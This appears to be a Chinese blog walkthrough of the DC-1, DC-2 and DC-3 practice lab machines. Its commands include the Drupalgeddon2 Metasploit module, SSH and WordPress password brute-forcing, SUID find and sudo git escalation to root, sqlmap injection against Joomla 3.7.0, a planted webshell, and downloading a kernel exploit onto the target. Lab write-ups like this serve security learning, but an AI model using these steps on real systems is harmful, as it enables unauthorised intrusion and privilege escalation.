DC 1-3 靶机渗透

DC-1靶机

端口加内网主机探测,发现192.168.114.146这台主机,并且开放了有22,80,111以及48683这几个端口。

DC 1-3 靶机渗透

发现是Drupal框架。

DC 1-3 靶机渗透

进行目录的扫描:

DC 1-3 靶机渗透

发现admin被禁止访问,以及robots.txt并进行访问,发现都是权限不足,查看一下漏洞。

DC 1-3 靶机渗透

看到一个远程命令执行漏洞,并且metasploit里面是能直接用的。

DC 1-3 靶机渗透

得到shell,这里使用到的模块是exploit/unix/webapp/drupal_drupalgeddon2 。

ls看到第一个flag。

继续切换到home目录发现flag4用户得到flag4,尝试读取flag4的密码,没有权限,尝试提权。

没有发现可利用的定时计划。

继续查看具有suid的程序尝试进行提权:

发现find命了,在主目录下没办法建文件,但是切换到tmp目录下,穿件文件

`touch test`  


www-data@DC-1:/tmp$ /usr/bin/find test -exec whoami \;
/usr/bin/find test -exec whoami \;
root

提权成功为root。

此时已经是root了,那么久不管剩下的flag了,这个靶机还是很简单的。

这道题还有一个麻烦的思路,那就是密码爆破了

Medusa -M ssh –h 192.168.114.146 –u flag4 -P /usr/share/john/password.lst -e ns -F 

利用他的ssh服务,使用medusa进行爆破。

密码为orange。

提权也是一样的套路。

DC-2靶机

端口加内网主机探测,发现主机192.168.114.147,开放了80端口以及7744端口。

DC 1-3 靶机渗透

但是直接访问是没有办法访问的,跳转到dc-2就没有相应了,需要修改一下host文件。

DC 1-3 靶机渗透

又是一个wordpress网站,扫目录没发现有价值的,wpscan扫一下,发现三个用户,没有插件,主题是twentyseventeen,未发现版本漏洞,查看站点,发现flag,查看告诉我们要进行爆破,并且工具推荐我们利用cewl,可能站点有信息能被利用到吧。

root@kali:~# wpscan --url http://dc-2/ -U dc4-user.txt -P dc-4.txt

DC 1-3 靶机渗透

DC 1-3 靶机渗透

DC 1-3 靶机渗透 登陆成功,用户为tom。

利用vim获取shell,告诉我们要切换用户,于是切换用户,密码之前已经爆出来了。

DC 1-3 靶机渗透

得到flag4。

DC 1-3 靶机渗透

find命令找一下,用git命令使用SUID提权到root。

成功提权

sudo git -p help config 
/bin/bash

接着可以利用python创造一个虚拟终端。

DC-3靶机

端口发现只开放了80端口,访问利用dirb进行目录爆破,发现很多,先到后台确认一下,http://192.168.114.148/administrator/

DC 1-3 靶机渗透

DC 1-3 靶机渗透

whatweb确认一下版本,只探测到了cms是joomla。

DC 1-3 靶机渗透

百度了一下,看到工具joomscan,kali里面直接get一下就行,安装完成,探测到版本号是3.7.0.查看有没有相关漏洞。

DC 1-3 靶机渗透

发现有很多漏洞,有一个sql注入漏洞。

DC 1-3 靶机渗透

告诉我们利用sqlmap即可即

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]   

DC 1-3 靶机渗透

发现五个数据库,继续爆表,joomladb应该能帮助我们找到管理员密码。

root@kali:~# sqlmap -u "http://192.168.114.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables  -p list[fullordering]  

有76个表。

发现表名:__bsms_books ,以及__users

DC 1-3 靶机渗透

爆列名:

root@kali:~# sqlmap -u "http://192.168.114.148/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns  -p list[fullordering] 

发现admin用户以及他加密后的密码,准备进行暴力破解,密码为snoopy。

DC 1-3 靶机渗透

登陆后端,看看有没有能够反弹shell,写木马的地方,重命名一个文件,写上一句话木马,蚁剑连一下,进入虚拟终端。

DC 1-3 靶机渗透

一些较常规的方法没有思路,看一下有没有系统的漏洞。

DC 1-3 靶机渗透

注意我们找到了这个漏洞,但是利用源码的地址是发生了变化,分目录是tree而不是raw了。
命令:

wget https://github.com/offensive-security/exploitdb-bin-sploits/blob/master/bin-sploits/39772.zip  

这个挂了,找不到源码包了,总之就是在目标机器上下载这个文件,然后在目标机器上解压exploit.tar, 最后就是两条指令:bash compile.sh,./doubleput

上一篇:django之重构用户表


下一篇:Hadoop基础(二十八):数据清洗(ETL)(二)复杂解析版